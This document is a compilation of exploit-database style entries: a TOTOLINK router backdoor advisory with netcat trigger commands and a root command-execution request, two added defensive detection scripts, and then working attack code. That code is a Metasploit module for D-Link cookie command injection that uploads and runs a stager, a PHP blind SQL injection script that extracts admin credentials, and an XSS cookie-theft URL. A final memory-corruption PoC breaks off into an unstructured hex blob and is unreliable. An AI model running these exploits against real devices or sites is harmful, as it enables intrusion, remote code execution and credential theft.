By sending a crafted request to the WAN IP, an attacker will open the HTTP remote management interface on the Internet. Then an attacker can use a Remote Code Execution in the HTTP remote management interface by using the hidden /boafrm/formSysCmd form, bypassing the authentication system.

We estimate there are =~ 50 000 routers affected by this backdoor.

## Details - backdoor

The init.d script executes the /bin/skt binary when the router starts:

    cat etc/init.d/rcS
    [...]
    # start web server
    boa
    skt&

skt is a small MIPS binary which is a client/server program. The arguments are:

    server: ./skt
    client: ./skt host cmd

The binary can be used in x86_64 machines using QEMU:

    sudo chroot . ./qemu-mips-static ./bin/skt

Using skt without argument will launch a TCP daemon on port 5555 in every interface (including WAN), acting as an ECHO server.

Using skt with arguments will send a TCP packet containing the command to the specified IP on port 5555.

The analysis of the binary running on the TOTOLINK devices (for more details, read https://pierrekim.github.io/blog/2015-07-XX-backdoor-in-TOTOLINK-products.html ) shows the server mode responds to 3 commands by silently executing system() in the background:

o By sending "hel,xasf" to the device, the device will execute:

    iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT

  This will open the HTTP remote management interface on port 80 in the eth1 interface which is the WAN interface by default.

o By sending "oki,xasf" to the device, the device will execute:

    iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT

  This will close the HTTP remote management interface.

o By sending "bye,xasf" to the device, the device will do nothing.

The iptables commands in the backdoor are hardcoded with "eth1". Only devices using DHCP and static IP connections are affected because the WAN IP is attached on the eth1 device.
It does not affect devices using PPPoE connections, because the WAN IP is attached on the ppp device, as seen below:

    totolink# ifconfig
    ppp0      Link encap:Point-to-Point Protocol
              inet addr:X.X.X.X  P-t-P:X.X.X.X  Mask:255.255.255.255
              UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1438  Metric:1
              RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0
              TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:64
              RX bytes:2803138455 (2.6 GiB)  TX bytes:277402492 (264.5 MiB)

An attacker can use these simple netcat commands to test the backdoor:

To open the HTTP remote management interface on the Internet:

    echo -ne "hel,xasf" | nc <ip> 5555

To close the HTTP remote management interface on the Internet:

    echo -ne "oki,xasf" | nc <ip> 5555

To detect a vulnerable router:

    echo -ne "GET / HTTP/1.1" | nc <ip> 5555

If you see "GET / HTTP/1.1" in the answer, you likely detected a vulnerable router.

## Details - RCE in the management interface

A hidden form in the latest firmware allows an attacker to execute commands as root by sending an HTTP request:

    POST /boafrm/formSysCmd HTTP/1.1

    sysCmd=<cmd>&apply=Apply&msg=

An attacker can use wget to execute commands in the remote device:

    wget --post-data='sysCmd=<cmd>&apply=Apply&msg=' http://ip//boafrm/formSysCmd

For instance, sending this HTTP request to the management interface will reboot the device:

    POST /boafrm/formSysCmd HTTP/1.1

    sysCmd=reboot&apply=Apply&msg=

This wget command will do the same job:

    wget --post-data='sysCmd=reboot&apply=Apply&msg=' http://ip//boafrm/formSysCmd

## Vendor Response

TOTOLINK was not contacted in regard to this case.

## Report Timeline

* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
* Jun 26, 2015: Working PoCs with RCE.
* Jul 13, 2015: Updated firmwares confirmed vulnerable.
* Jul 16, 2015: A public advisory is sent to security mailing lists.

## Credit

These vulnerabilities were found by Alexandre Torres and Pierre Kim (@PierreKimSec).

## References

https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html

## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
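The detection check in the advisory (a harmless probe sent to TCP/5555 that comes back verbatim) is easy to script for inventorying one's own network. The following is an added example, not code from the advisory or from TOTOLINK; the function names `classify_reply` and `probe_host` are assumptions, and the loopback echo server is a constructed stand-in for a backdoored device so the code runs offline.

```python
"""Echo-service probe for the TOTOLINK skt backdoor described in the advisory above.

Added example for defenders inventorying their own devices; not code from the
advisory or from TOTOLINK. The check mirrors the advisory's netcat test: the skt
daemon on TCP/5555 echoes whatever it receives, so a harmless probe that comes
back verbatim is a strong indicator. The echo server below is a constructed
stand-in for a backdoored router so the demonstration never touches real hardware.
"""
import socket
import threading

BACKDOOR_PORT = 5555              # port the skt daemon listens on (from the advisory)
PROBE = b"GET / HTTP/1.1"         # the advisory's harmless detection probe


def classify_reply(probe: bytes, reply: bytes) -> str:
    """Interpret what a service on the probed port sent back.

    'echo'   : reply contains the probe verbatim, consistent with the skt echo server
    'silent' : connection accepted but nothing came back, inconclusive
    'other'  : a different service answered (for example a real HTTP banner)
    """
    if not reply:
        return "silent"
    if probe in reply:
        return "echo"
    return "other"


def probe_host(host: str, port: int = BACKDOOR_PORT, timeout: float = 3.0) -> str:
    """Connect, send the probe and classify the reply; 'closed' if the port does not answer."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(PROBE)
            chunks = []
            try:
                while True:
                    data = s.recv(1024)
                    if not data:
                        break
                    chunks.append(data)
                    if len(b"".join(chunks)) >= len(PROBE):
                        break          # enough to decide, do not wait for a close
            except socket.timeout:
                pass
            return classify_reply(PROBE, b"".join(chunks))
    except OSError:                    # refused, unreachable, timed out
        return "closed"


def start_echo_server() -> tuple:
    """Constructed stand-in for the backdoor daemon: a one-shot TCP echo server on 127.0.0.1.

    Returns (port, thread); the port is ephemeral so the demo never needs 5555 itself.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            data = conn.recv(1024)
            conn.sendall(data)         # echo back, like skt in server mode
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, t


if __name__ == "__main__":
    port, _ = start_echo_server()
    print("127.0.0.1:%d -> %s" % (port, probe_host("127.0.0.1", port)))
```

A real HTTP service or a closed port on 5555 yields 'other' or 'closed'; only an echoed probe should be treated as a likely backdoored device.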

D-Link Devices - Cookie Command Execution (Metasploit)

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link Cookie Command Execution',
      'Description'    => %q{
        This module exploits an anonymous remote upload and code execution
        vulnerability on different D-Link devices. The vulnerability is a command
        injection in the cookie handling process of the lighttpd web server when
        handling specially crafted cookie values. This module has been successfully
        tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
      },
      'Author'         =>
        [
          'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
          'Michael Messner <devnull[at]s3cur1ty.de>'         # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'References'     =>
        [
          ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
        ],
      'DisclosureDate' => 'Jun 12 2015',
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'MIPS Little Endian', # unknown if there are LE devices out there ... but in case we have a target
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSBE
            }
          ]
        ],
      'DefaultTarget'  => 1
    ))
  end

  def check
    begin
      res = send_request_cgi({
        'uri'    => '/',
        'method' => 'GET'
      })
      if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Trying to access the device ...")
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
    end

    print_status("#{peer} - Uploading stager ...")
    @counter = 1
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 95 # limited by our upload, larger payloads crash the web server
    )

    print_status("#{peer} - creating payload and executing it ...")
    (1 .. @counter).each do |act_file|
      # the http server blocks access to our files ... we copy it to a new one
      # the length of our command is restricted to 19 characters
      cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "chmod +x /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "/tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "rm /tmp/#{act_file}"
      execute_final_command(cmd)
      cmd = "rm /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
    end
  end

  def execute_command(cmd,opts)
    # upload our stager to a shell script
    # upload takes quite long because there is no response from the web server
    file_upload = "#!/bin/sh\n"
    file_upload << cmd << "\n"

    post_data = Rex::MIME::Message.new
    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
    post_data.bound = "-#{rand_text_alpha(12)}--"
    file = post_data.to_s
    @counter = @counter + 1

    begin
      send_request_cgi({
        'method'   => 'POST',
        'uri'      => "/web_cgi.cgi",
        'vars_get' => {
          '&request' => 'UploadFile',
          'path'     => '/tmp/'
        },
        'encode_params' => false,
        'ctype'    => "multipart/form-data; boundary=#{post_data.bound}",
        'data'     => file
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  def execute_final_command(cmd)
    # very limited space - larger commands crash the webserver
    fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
    begin
      send_request_cgi({
        'method' => 'GET',
        'uri'    => "/",
        'cookie' => "i=`#{cmd}`"
      }, 5)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
```
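Both steps the module relies on leave a visible signature in the HTTP traffic: a Cookie value carrying shell command substitution (the `i=` cookie built in execute_final_command) and a multipart POST to /web_cgi.cgi with request=UploadFile into /tmp/ (the stager upload). The following is an added detection example, not code from the Metasploit module, from the referenced PoC, or from D-Link; it parses raw requests as a reverse proxy or IDS in front of the device would capture them, and the sample requests and the 192.0.2.10 address are constructed.

```python
"""Detection for the D-Link lighttpd cookie injection traffic used by the module above.

Added example (not part of the Metasploit module, the PoC it references, or D-Link
firmware). It inspects raw HTTP requests and flags the two indicators the module
relies on: shell command substitution inside the Cookie header and a stager upload
through /web_cgi.cgi?request=UploadFile&path=/tmp/. Sample requests are constructed.
"""
import re
from typing import Dict, List

# Shell command-substitution forms; the module sends "i=`<cmd>`" in the Cookie header.
SUBSTITUTION_RE = re.compile(r"`[^`]*`|\$\([^)]*\)")
# Stager upload target; the module builds "/web_cgi.cgi?&request=UploadFile&path=/tmp/".
UPLOAD_TARGET_RE = re.compile(r"^/web_cgi\.cgi\?(.*)$")


def parse_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP request into method, request target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0] if parts else ""
    target = parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def find_indicators(raw: str) -> List[str]:
    """Return the indicator names matched by one request (empty list means nothing suspicious)."""
    req = parse_request(raw)
    hits = []
    cookie = req["headers"].get("cookie", "")
    if SUBSTITUTION_RE.search(cookie):
        hits.append("cookie-command-substitution")
    m = UPLOAD_TARGET_RE.match(req["target"])
    if m and req["method"] == "POST":
        query = m.group(1)
        if "request=UploadFile" in query and "path=/tmp/" in query:
            hits.append("web_cgi-upload-to-tmp")
    return hits


def scan(requests: List[str]) -> Dict[int, List[str]]:
    """Map request index -> indicators for every request that matched at least one rule."""
    report = {}
    for idx, raw in enumerate(requests):
        hits = find_indicators(raw)
        if hits:
            report[idx] = hits
    return report


# Constructed sample traffic: 0 and 3 mimic the cookie injection, 2 mimics the
# stager upload, 1 is an ordinary request with a normal session cookie.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: 192.0.2.10\r\nCookie: i=`cp /t*/1 /tmp/2`\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 192.0.2.10\r\nCookie: session=abc123; lang=en\r\n\r\n",
    "POST /web_cgi.cgi?&request=UploadFile&path=/tmp/ HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "Content-Type: multipart/form-data; boundary=-abcdefghijkl--\r\n\r\n(body omitted)",
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\nCookie: i=$(id)\r\n\r\n",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_REQUESTS).items():
        print("request %d: %s" % (idx, ", ".join(hits)))
```

A single hit on the upload rule can be benign on devices that expose that CGI legitimately; the cookie rule is the stronger signal, and the two together in one source's traffic match the module's sequence.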

AraDown - 'id' SQL Injection

source: https://www.securityfocus.com/bid/54891/info

AraDown is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

```php
<?php
echo "
[*]-----------------------------------------------------------------------[*]
# Exploit Title : ArDown (All Version) <- Remote Blind SQL Injection
# Google Dork : 'powered by AraDown'
# Date : 08/07/2012
# Exploit Author : G-B
# Email : g22b@hotmail.com
# Software Link : http://aradown.info/
# Version : All Version
[*]-----------------------------------------------------------------------[*]

[*] Target -> ";
$target = stdin();
$ar = array('1','2','3','4','5','6','7','8','9','0',
            'a','b','c','d','e','f','g','h','i','j','k','l','m',
            'n','o','p','q','r','s','t','u','v','w','x','y','z');
// Marker present in the response when the injected comparison does not match
$marker = '<span class="on_img" align="center"></span>';

echo "[*] Username : ";
for($i=1;$i<=30;$i++){
    foreach($ar as $char){
        $b = send($target,"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
        // no candidate matched at this position: end of the username reached
        if(stripos($b,$marker) !== false && $char == 'z'){ $i = 50; break; }
        if(stripos($b,$marker) !== false) continue;
        echo $char;
        break;
    }
}

echo "\n[*] Password : ";
for($i=1;$i<=32;$i++){
    foreach($ar as $char){
        $b = send($target,"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
        if(stripos($b,$marker) !== false) continue;
        echo $char;
        break;
    }
}

// POST the injected value as the 'id' parameter of ajax_like.php and return the page body
function send($target,$query){
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php");
    curl_setopt($ch,CURLOPT_POST,true);
    curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query));
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    $r = curl_exec($ch);
    curl_close($ch);
    return $r;
}

// Read one trimmed line from standard input
function stdin(){
    $fp = fopen("php://stdin","r");
    $line = trim(fgets($fp));
    fclose($fp);
    return $line;
}
?>
```

phpList 2.10.18 - 'unconfirmed' Cross-Site Scripting

source: https://www.securityfocus.com/bid/54887/info

PHPList is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PHPList 2.10.18 is vulnerable; other versions may also be affected.

    http://www.example.com/admin/?page=user&find=1&unconfirmed=%22%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Full Player 8.2.1 - Memory Corruption (PoC)

```python
#!/usr/bin/python
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: Full Player 8.2.1 Memory Corruption PoC
#[+] Date: 13-07-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7
#[+] Vendor: http://www.fplayer.net
#[+] Download: http://www.fplayer.net/full_player.exe
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)

import os
os.system("color 02")

print("###########################################################")
print("# Title: Full Player-8.2.1 Memory Corruption PoC #")
print("# Author: SATHISH ARTHAR #")
print("# Category: DoS/PoC # ")
print("###########################################################")
```
7F\xD7\xAD\xE1\xB7\x15\x48\xC2\x00\x5E\x8B\x85\xC0\x05\xFE\x1B\x26\x6C\x24\xC1\xEF\x6E\x01\x4E\x19\xE6\xBF\x82\x92\x06\x92\xE0\xD7\x59\x92\xB8\x10\xB0\xCF\x63\xCC\xA5\xAA\x2A\x1C\x0E\x1F\x00\x00\x00\x00\x00\xEC\xCF\xEA\xA3\x9D\x1E\x85\xC4\xA8\xD9\x4E\xB9\x55\x99\x58\xA9\xBE\xAB\x76\x98\x79\xF5\xA6\x1A\x32\x19\x57\xD9\xD6\x57\xCB\xED\x53\x2E\x3E\x4D\xF7\x0A\x73\xAE\x91\xD7\x37\x1B\x28\xE9\xC4\xA7\x56\xFB\x31\x89\x2C\xBA\xBE\xF3\x5B\xCE\x96\x58\xB8\x2E\x2D\x5D\xE4\xDD\xB0\x38\xDE\x7C\x03\xF0\x5A\x8F\xEA\xF3\xD3\xE9\x2C\x5C\x0E\x78\x9C\xED\xBC\x7F\xE2\x9B\x58\x45\xEA\x3C\xA7\xEA\xE1\xF2\x4D\x1F\xE8\xC7\x92\x5B\xDB\xE1\xE3\xA9\xF3\xD6\x90\x4C\x7C\x73\x90\x9F\xEE\x54\x70\xDB\xBB\x4C\x2E\xCC\xF3\xAF\x75\xAF\xEA\xB6\xC9\xCC\xAA\xAC\x5A\x1E\xFF\x9F\x9D\xA9\x38\x24\xDE\x56\x9D\x49\xD7\x9D\xA2\x1A\xD5\x30\xBE\xFF\x12\x3F\x58\xBE\xEF\x9F\xAB\x59\x94\x11\x10\x4C\xAD\xB1\xF3\x5A\x88\x4B\xC4\xED\x06\x6A\x1C\xE7\x12\x06\xB5\xC2\x34\x2C\x5E\xCF\x4C\xE5\x66\x3E\x64\x26\xE5\x94\x28\x6C\xA7\x66\x9D\x9A\x31\x8C\x60\xCF\x79\x89\xFB\x8B\x6C\xA8\x6E\x31\x2D\x2F\x94\xA7\x33\x27\x9B\x21\x6D\xAE\x33\xF9\xEC\xEB\xD8\x08\x21\x21\x7C\x96\xDA\xC5\xB7\x9D\x8A\x51\x6F\xCC\xD5\x7E\x53\xB9\xEA\xD9\x77\x7C\x7B\xCF\x13\xD1\xB7\xC8\x77\x8F\x14\x43\x45\x9F\x85\x7B\xAA\xA8\x21\xFA\xA4\xCF\xE6\x0D\xF3\xB2\xE8\x4D\x13\x41\x00\xFE\xCB\x95\xC2\x45\xCD\xBF\x06\xB1\xFD\x32\x24\x8A\x1C\xCC\x65\x3A\x05\xF9\x9F\x01\x1C\x24\x8A\xAD\xF5\xBE\x6F\xC2\xB1\xCF\xAD\xF6\x59\xAD\xB2\xD1\xC9\x00\x00\x00\x00\x00\x69\x25\x8D\x17\x57\x5F\x87\xAF\x65\x6B\x46\x39\xE4\xDC\xAF\x72\xA7\x6B\x27\x21\x75\xD3\xF2\x96\x07\x13\xBD\xBB\x1D\xCE\xE7\xA1\xF1\x8A\x1F\xD9\x8E\x3D\xAF\x18\x8F\xA7\xC5\xE9\xCD\x39\x71\xBA\x96\x35\x07\x3B\x3D\x6F\xB9\xBB\x5E\x2C\x4E\x13\x71\xEE\x9D\x77\x93\xFE\xD7\x7B\x73\x42\xF4\xAF\x1A\x7E\x30\x13\x27\xF3\xFF\x88\x4B\xEA\xF1\x96\xF0\x39\x59\x05\xB7\xB6\xC9\x7D\xFE\xF1\x9C\x33\x6A\x82\xE6\xE4\x27\x34\x59\x49\x81\x2C\x98\xFD\x12\xA1\xDD\xD5\x79\xCC\x2E\x6B\x2A\x2B\x76\x1C\x23\x85\x50\x2F\xD9\xF4\xDD\xA7\x5F\xAD\x
8D\x3A\xA2\xF8\xDA\x23\x58\x6B\x2E\x7C\xB8\xCA\xFB\xA5\x4D\xBA\x86\x6B\x77\x7D\xEC\xAF\x4F\xB3\x87\x83\x73\x38\xBD\x94\xAF\xD5\xB9\xF9\xB6\x71\xDD\x1B\x28\x60\xDC\x67\x47\xCC\xED\xC1\x24\x64\xAF\xD1\xCE\xC3\x94\x00\x6A\x1E\x3A\xA7\xA8\xD6\x7C\xCD\xE6\x70\x32\x67\x09\xFE\xFD\x52\xE7\x4E\xB5\xC8\xE2\x64\x51\x71\x4F\x56\xE2\x5D\xF3\xE2\x56\x77\xDB\x68\xB4\x0C\x32\x17\x91\x16\xB3\x75\x5F\xF4\xDE\x00\x1A\x2F\x77\xA6\xD3\x9F\x9F\x52\xEC\x25\xA3\xD3\x23\xE3\x0B\xD6\x8D\x64\xC2\x50\xA1\x43\x85\xA1\xDE\x84\x1C\x18\xD9\x16\x38\x00\x36\x9A\x0D\x40\x0E\xE6\x3F\x03\x92\x1B\xC9\xFA\x3A\xB5\x45\x44\x0D\xE6\x3F\x07\xC2\x44\xAA\xFD\x67\x1D\x79\xD1\xFA\x63\x4D\x62\x76\xF3\xF2\xD1\x38\x1C\x67\x77\x5B\x37\x4F\x9E\x71\x61\xCC\xC7\xCE\x8C\x58\xCE\xE7\x43\xC2\xDE\xB6\x59\xA3\xE5\xCA\x34\x3D\x17\x00\x00\x00\x00\x00\xA6\x0D\x6E\x36\xFA\xCF\xAC\x72\x63\x0F\xBA\xDB\xCE\x33\xB5\x5A\xCE\x3F\x99\x57\x7B\xA8\xBB\x38\x5F\x3A\xBC\x69\x9A\x93\x63\xEB\x6F\x59\x7C\x57\xBE\xF6\xAE\x97\xF6\xD7\xBF\x27\x1D\x79\x3C\x8C\xD2\x67\xD6\xF3\x35\xB8\xE0\xFE\xF1\x7A\xF1\xF5\xEA\x73\xEE\xF5\xFB\xD1\xEE\x5C\xE2\x93\xC7\x5D\x45\x9D\x5D\xD7\x8A\xB2\x81\xDD\x9B\x86\xDA\x4B\xD5\xD6\x00\xB5\x09\x8F\x2B\x4E\x7B\x20\x4B\x78\xAD\x35\xB9\xD5\xD3\xD5\xE7\x4B\x9B\x9E\xF3\x25\xAE\x47\xEA\xA8\xE0\xB1\xDF\x8F\x1A\x6D\x92\x8F\xB0\x3E\xFF\xC1\x8C\xE3\x6F\xA2\x08\x0A\x1F\xFC\x55\x1E\x0D\x5F\xD9\xAA\x8B\xCA\xCA\xCA\x4E\x9A\x66\xF3\x4B\x24\xE7\x26\x14\x63\x0D\x87\x81\xE7\x57\x7D\x55\xCF\x9D\x99\xD5\xF1\x35\x69\x2A\xEB\xF5\x7D\x4E\x36\x5D\x59\x2A\x86\x1A\xB6\x6A\x5D\x5B\xF0\x9A\x6C\x5B\xE7\xA3\xAA\xBD\x1C\x9F\x54\x0D\x1B\x20\xAD\x86\xDD\xEB\x7D\x9E\x2C\x24\xAA\x18\xB5\xC0\xE4\x93\xB9\xC9\x65\x22\x90\x29\x73\x4B\x8D\xBE\x2D\xA6\x23\x8B\x9D\xF0\xA6\xA4\xA6\x7D\x57\xA7\x7D\xBC\x5B\x08\x0B\x02\x6C\x49\x36\x72\xE8\x40\x86\x77\xCB\x7F\x0D\xFF\x2E\xBF\xCB\xB6\x90\x02\x51\x53\x0F\x15\xE3\xC9\x50\x41\x15\xB4\x72\x4B\x36\xE2\xA1\x46\xC7\x46\xBD\xB5\xDA\x94\x33\xA8\xED\x60\xF8\x01\xCC\x24\x20\x00\xB8\xDB\x07\x98\xED\xEF\xDB\x22\x81\xC3\xFE\xF2\x
FC\xBA\x14\xFB\x1D\xCF\x06\xD7\xE3\xB8\xFC\x3D\x6F\xD0\xDE\xD0\x61\xFE\x1C\xAF\xB9\x72\xE3\xED\xC2\xA2\xB8\xF6\x6E\x5E\x1A\xF8\xF0\xB5\x61\xFC\xD1\x06\xDC\x8A\x05\x35\xE6\xA5\x26\x07\xA9\xE2\x52\x8E\xFF\x84\xBA\x6E\xFE\x00\xDB\x2C\xC8\xEC\x89\x01\xC0\x83\x25\xC0\xF4\xA5\xD3\x70\xFC\xDF\x9C\xB9\xEB\x85\x25\xCA\x3D\xF1\xE1\x8A\x6E\xEB\xEB\x2F\xFC\x64\x53\xC6\x7A\x36\xE5\x9B\xE7\xBD\xE9\x9C\x67\xF2\xF2\xB8\x79\x79\x70\x72\xEF\x75\xAE\x07\x69\x89\x6E\x7F\xF9\x51\xE5\xA4\xDF\x02\x00\xAC\x5E\x23\xBF\x41\xCE\xDD\x99\xDA\x8D\x3C\x9D\x87\xFA\xD6\xB1\x7D\xD7\xA7\x75\xDB\xAC\xE5\x04\xE9\xB0\x1B\xC7\x0D\x3C\x55\x6D\x67\xDF\x9A\x9F\xEF\xBF\x74\x36\x77\x23\x1F\xEB\xB5\xF7\xEA\x9D\x6A\xAE\x9B\x6F\xD5\xDD\xB7\x65\xAF\xF7\x97\x16\x23\xDF\xD4\xC3\xA5\x73\xFB\x1F\x14\x79\xFC\xE2\x95\xBF\xB0\xD7\xA8\xC1\x92\x65\x3B\xDB\x3D\x1F\xF3\x45\x00\xC4\x76\x75\x39\xCC\xD4\xF4\x20\xD4\x3B\xE0\x23\xA6\xD4\x24\xFC\x03\xAC\xFB\x82\x8A\xE7\xDB\x93\x00\xFD\x1A\xC0\xB0\xDE\x9B\x2F\x5C\x47\x3F\x3D\x8F\xF1\xFF\x86\x5D\x6E\xBE\x7E\x8D\x17\x5F\x99\xD7\xF2\x3A\x18\xAC\x63\xD2\xFD\x1D\x1C\x3B\x4B\xA9\xFE\xA2\x6A\x4F\x1E\xFF\x8C\xEE\xD6\x48\xAA\xA2\x47\xE7\xDF\xBC\x2C\xB8\xF5\xA4\x03\x9A\x9A\x0D\xE1\x1C\xF4\x3F\x07\xC5\x44\x12\x5E\x68\xB6\x00\x52\xE0\xBF\x01\x23\x4C\x24\x91\xFB\x03\x00\xE4\x6B\xF1\xE1\xEC\xD1\xD9\xEC\x26\xA2\xDF\x04\xE7\xC9\x49\x9E\x74\xCA\x03\xCC\xFD\x38\xF6\xAA\xA0\xA5\x1B\x9E\x8C\x31\x55\x19\x00\x00\xC6\x44\x12\x21\x22\x76\x1B\xDC\x9E\xBF\xD3\x47\x0D\x39\xE5\xE5\xEB\xB3\xB8\xF4\xF5\x4B\xBF\xD2\x99\xEE\xD3\x71\x8F\xA6\xE1\xB8\x3D\x1B\x0D\x4A\x69\x8A\x97\xB6\xEB\x82\xB1\x62\x17\x35\xBD\x99\x1B\xA0\x59\xD8\xB4\x96\x30\x5A\x83\xB3\x67\x88\xCE\xB5\xD3\xB9\x57\x35\x86\x46\x13\x9D\xED\xE8\x59\xBA\xEB\xBE\x5A\x5A\x74\xD2\xBF\x2F\x2B\x66\x2B\xCF\xF1\x7D\x41\x7C\xCE\x9B\xC6\x2F\xD5\x59\xB3\x85\x7A\x34\xA3\xFD\x9E\xD8\x1E\xE9\xB5\x8E\xC6\x76\x40\x3B\x1D\xAE\xC7\xE5\x25\xDF\x7E\xF6\x62\x5B\xE0\xA0\xA6\xBB\x67\x49\xA2\x7D\xA3\x8B\x0D\x30\xFF\xFB\xFE\x9B\x83\xEA\x99\x02\x4D\xD4\x26\x92\xBA\x78\xC9\x17\x
AD\x79\xBF\x58\x50\xCE\x1C\x9B\x2E\xCF\x6B\x91\xA8\x17\xD7\xAB\x9A\xDE\xCC\x28\x93\x33\xEF\x8D\xA9\xBB\xDE\x4A\xBC\x75\x4A\xDE\x52\xE7\x49\x3F\x62\x26\xF8\xCC\x46\xB5\x49\xA0\xE1\xD7\x79\x89\x28\xFA\x12\x9B\xCE\x8D\x48\x98\x35\xBB\xF3\xFE\xEA\x9E\x36\x3D\x9B\xD9\xC9\x34\xD6\xDD\x0D\xB0\xBB\xA6\x99\x5C\x69\xD8\x7D\xC9\xDF\x19\x47\x20\x23\x61\xD9\x46\x16\xE8\x46\xC6\xD8\xC2\x13\x73\x8D\x6F\xF8\xFE\x76\x5A\xF8\xF9\x77\x77\xAD\x8B\x37\x73\x32\x95\xD5\x11\x38\x70\x7F\x60\xD9\x60\x1C\x5A\xC2\x0A\xE4\x3F\xC2\x96\x1D\xD0\x00\x0E\x98\x15\xC0\xF0\x1E\xC7\x82\xDE\x07\xD3\x85\x7C\x48\x2F\xF0\xC4\x31\xAD\xC4\xD1\x36\x40\x21\x08\x7E\xDB\x45\x20\x07\xF9\xAF\x81\xF2\x22\x59\x5B\xEF\x96\xC5\x18\xEC\xBF\x06\xC2\x46\x12\xFC\xBD\xFE\xB4\x57\x62\x2F\x7C\x03\x67\x94\xB0\xCF\x39\x6B\x6B\xA3\x32\x2D\x75\x61\x00\x00\x00\x00\x80\xC9\xFB\xD3\x63\x26\xEA\xE7\xC7\xB7\x5F\x5F\xA7\x06\x1B\x93\x7B\x0D\x87\xB3\x8D\xC9\x91\xB3\xDD\x5B\x75\x1D\xB7\x9B\x7E\x65\xA2\xDA\x3B\x48\x5A\x5E\x27\x9A\xB5\x95\x37\xBB\xAB\xF2\x97\xC7\x07\x85\x26\xE7\x68\xD5\x74\xCE\xC9\xB6\x4B\xE5\xF1\xBA\x0F\x44\x48\xB8\x27\xD4\xDD\xA9\x3C\xB2\xEE\x55\x4F\xDA\x6C\xFC\xCA\xDE\xCF\xB0\x32\x9F\x28\xD8\xE1\x97\xBF\xB4\x2B\xCF\x53\x35\xE7\x92\x1C\xBB\x39\xFA\xE5\xE5\xF8\x99\x07\xDC\x1B\x77\xBA\xA9\x0E\x89\xCE\xC2\xD9\xF7\x6F\xE7\xC1\x43\x47\x56\x9E\x99\x9D\x86\x86\x9F\x7A\xB4\x6F\xB9\x6F\x49\x40\x29\